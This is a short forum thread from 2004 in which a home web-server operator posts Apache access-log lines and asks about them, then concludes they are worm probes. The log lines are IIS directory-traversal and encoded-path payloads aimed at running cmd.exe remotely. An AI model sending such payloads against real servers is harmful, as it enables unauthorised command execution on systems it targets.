Web Server question

VxDx

FFR Player

Join Date: May 2003

Posts: 1871
Share

Post
#1

Web Server question

03-17-2004, 07:12 PM

so I'm running my webserver now, on my own computer, and was wondering if someone who knew something about web servers could tell me something....

I'm using apache and I go look at the access log and I find a few weird entries. I was just wondering what these were.

68.84.17.24 - - [17/Mar/2004:18:05:18 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
68.84.17.24 - - [17/Mar/2004:18:05:18 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
68.84.17.24 - - [17/Mar/2004:18:05:18 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.84.17.24 - - [17/Mar/2004:18:05:18 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.84.17.24 - - [17/Mar/2004:18:05:18 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.84.17.24 - - [17/Mar/2004:18:05:19 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
68.84.17.24 - - [17/Mar/2004:18:05:19 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
68.84.17.24 - - [17/Mar/2004:18:05:19 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
68.84.17.24 - - [17/Mar/2004:18:05:19 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.84.17.24 - - [17/Mar/2004:18:05:20 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.84.17.24 - - [17/Mar/2004:18:05:20 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.84.17.24 - - [17/Mar/2004:18:05:20 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.84.17.24 - - [17/Mar/2004:18:05:20 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.84.17.24 - - [17/Mar/2004:18:05:20 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.84.17.24 - - [17/Mar/2004:18:05:21 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.84.17.24 - - [17/Mar/2004:18:05:21 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

???

the site is vxd.ath.cx if you want to visit, but there really isn't much there.
Tags: None
VxDx

FFR Player

Join Date: May 2003

Posts: 1871
Share

Post
#2

03-17-2004, 07:17 PM

ok, well nevermind, I guess it's a worm trying to access the server, which it clearly cannot.

go to the site anyways so I can see how it reacts to people being on it.

http://vxd.ath.cx

DL speeds won't be too great since it still has to upload through my ISP, which is about 30mbps...

Also, if the server is not running I probably turned it off. It should be on though, for a little while at least.
Comment

Web Server question

Comment